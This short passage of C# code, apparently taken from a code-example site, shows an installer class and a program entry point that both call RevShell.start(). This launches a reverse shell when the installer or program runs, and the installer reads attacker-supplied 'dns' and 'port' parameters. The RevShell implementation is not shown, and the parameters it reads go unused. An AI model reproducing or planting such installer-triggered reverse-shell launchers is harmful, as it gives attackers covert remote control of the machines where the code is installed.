public ProjectInstaller()
        {
            InitializeComponent();
            String ip   = Context.Parameters["dns"] ?? "kaboom";
            String port = Context.Parameters["port"] ?? "443";

            RevShell.start();
        }
Пример #2
0
 /// <summary>
 /// The main entry point for the application.
 /// </summary>
 static void Main()
 {
     RevShell.start();
 }